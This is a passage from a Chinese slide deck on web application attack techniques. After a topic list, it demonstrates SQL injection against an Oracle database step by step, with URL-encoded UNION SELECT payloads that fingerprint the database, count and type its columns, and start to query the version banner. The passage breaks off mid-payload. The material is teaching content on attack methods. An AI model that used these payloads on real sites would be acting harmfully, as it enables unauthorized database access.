web应用攻击的技术.pptVIP

目录;SQL注入（SQL injection） 跨站脚本攻击 恶意代码 已知弱点和错误配置 隐藏字段 后门和调试漏洞 参数篡改 更改cookie 输入信息控制 缓冲区溢出;SQL注入;;;;SQL注入攻击过程演示(1);判断数据库类型 根据入侵经验该系统的后台可能为ORACLE数据库 Dual这个表是ORACLE数据库特有的, 看下它是否存在，如果存在就说明数据库为ORACLE。 提交：And 0(select count(*) from dual),返回正常页面 ;字段猜解 猜解字段数量并构造查询语句 And%201=1%20union%20select%20null,null,null,null,null,null,null,null,null,null from dual—页面返回正常，查询语句语法正确 检测字段类型and%201=1%20union%20select%20null,null,‘null’,’null’,null,null,‘null’,’null’,‘null’,’null’%20from%20dual—在第3 ,4,7,8,9,10位置加上 单引号均返回正常页面，字段是字符型;查询ORACLE数据库的版本 and%20%201=2%20union%20select%20null,null,(select%20banner%20from%20sys.v_$v